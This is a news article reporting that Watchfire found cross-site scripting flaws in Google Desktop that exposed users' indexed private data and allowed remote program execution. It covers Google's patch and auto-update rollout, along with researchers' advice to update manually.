Critical Vulnerability Caught In Google Desktop - InformationWeek
Software // Enterprise Applications
01:34 PM

Critical Vulnerability Caught In Google Desktop

Google is pushing out a fix to users through its auto updating system, but security pros recommend users manually update their systems.

A security company is advising people who use Google Desktop to immediately download the latest version to protect their computers from a critical vulnerability.

Danny Allan, director of security research at Watchfire, a security and analysis company, says researchers found a vulnerability in Google Desktop that puts users' private information at risk and enables remote attackers to run programs on the infected machines. Allan says they reported the vulnerability to Google on Jan. 4, and the online search leader created a fix for it on Feb. 1.

Allan notes that while Google says it can automatically update its software and take care of the vulnerability, he has had to manually update his three home computers. "The fix is in their latest version," he says. "My software did not [automatically] patch. We had some issues with the updating mechanism. It didn't work at all. We had to install it manually."

Barry Schnitt, a Google spokesman, says the company started pushing out auto updates a few weeks ago and is still in the process of getting to its millions of users. He also says the auto update will work in the "vast majority" of cases. "A fix was developed quickly, and users are being automatically updated with the patch. In addition, we have [added] another layer of security checks to the latest version of Google Desktop to protect users from similar vulnerabilities in the future," Schnitt says.

Google hasn't received any reports of the vulnerability being exploited, Schnitt says. "However, users should make sure they are running the latest version of Google Desktop by going to and downloading the latest version and installing it," he adds.

Watchfire's Allan says there actually are three separate flaws wrapped up in this vulnerability. All three are cross-scripting issues, which allow remote users to inject Java script into a Web application like Google Desktop. Allan says about 80% of Web applications are vulnerable to varying degrees to cross-scripting, but the Google Desktop vulnerability "constitutes the most serious outcome that I have seen."

Google Desktop has the ability to cache and remember all of a user's private and corporate information. It basically is a mini agent that lives on the desktop computer and crawls through e-mail, zip files, office documents, and Web sites visited. It indexes all of the information and stores it within its cache.

This vulnerability allows a remote attacker to access this cache and all the information in it, explains Allan.

The malware is introduced to the computer if the user clicks on a link in an e-mail or visits a malicious Web site. The malware connects to that link, according to Allan, and injects the malicious script onto the computer.

Once a computer is infected, the attacker can search for information on the computer and download it to his own system, control how the Web application functions, and run programs remotely on the computer. Allan notes that the first two uses are serious but calls the remote control a critical issue.

Comment  | 
Print  | 
More Insights
Newest First  |  Oldest First  |  Threaded View
How Enterprises Are Attacking the IT Security Enterprise
How Enterprises Are Attacking the IT Security Enterprise
To learn more about what organizations are doing to tackle attacks and threats we surveyed a group of 300 IT and infosec professionals to find out what their biggest IT security challenges are and what they're doing to defend against today's threats. Download the report to see what they're saying.
Register for InformationWeek Newsletters
White Papers
Current Issue
Annual IT Salary Report 
Base pay for IT professionals has remained flat this year with a median annual salary of $88,000 for staff and $112,000 for management. However, 58% of staff and 62% of managers who responded to our survey say they're satisfied with their compensation. Download this report to find out which positions earn the highest compensation.
Twitter Feed
InformationWeek Radio
Archived InformationWeek Radio
Join us for a roundup of the top stories on for the week of November 6, 2016. We'll be talking with the editors and correspondents who brought you the top stories of the week to get the "story behind the story."
Sponsored Live Streaming Video
Everything You've Been Told About Mobility Is Wrong
Attend this video symposium with Sean Wisdom, Global Director of Mobility Solutions, and learn about how you can harness powerful new products to mobilize your business potential.
Flash Poll